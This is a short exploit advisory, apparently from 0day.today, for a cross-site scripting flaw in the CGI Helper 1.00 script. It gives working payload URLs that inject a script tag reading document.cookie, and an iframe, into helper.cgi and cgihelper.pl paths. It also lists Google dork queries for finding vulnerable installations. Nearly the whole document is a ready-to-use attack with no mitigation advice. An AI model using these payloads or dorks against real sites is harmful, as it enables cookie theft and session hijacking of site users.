Exploit for unknown platform in category web applications
==================
CGI Helper 1.0 xss
==================
## CGI Helper 1.00 ##
## Download: http://www.sourcecodeonline.com/details/cgi_helper.html ##
The script CGI Helper 1.00 is vulnerable to XSS.
Example:
www.site.com/cgi-bin/helper.cgi
XSS:
www.site.com/cgi-bin/helper.cgi/>’><script>alert(document.cookie)</script>
or
Example:
http://www.site.com/cgi-bin/cgihelper.pl
XSS:
http://www.site.com/cgi-bin/cgihelper.pl/>’><script>alert(document.cookie)</script>
The script makes infinite iframes that can affect the user:
http://www.site.com/cgi-bin/helper.cgi/>’><iframe src=http://www.google.com.br>
or
http://www.site.com/cgi-bin/cgihelper.pl/>’><iframe src=http://www.google.com.br>
Google dork:
inurl:cgihelper.pl
inurl:cgi-bin/helper.cgi
# 0day.today [2018-01-08] #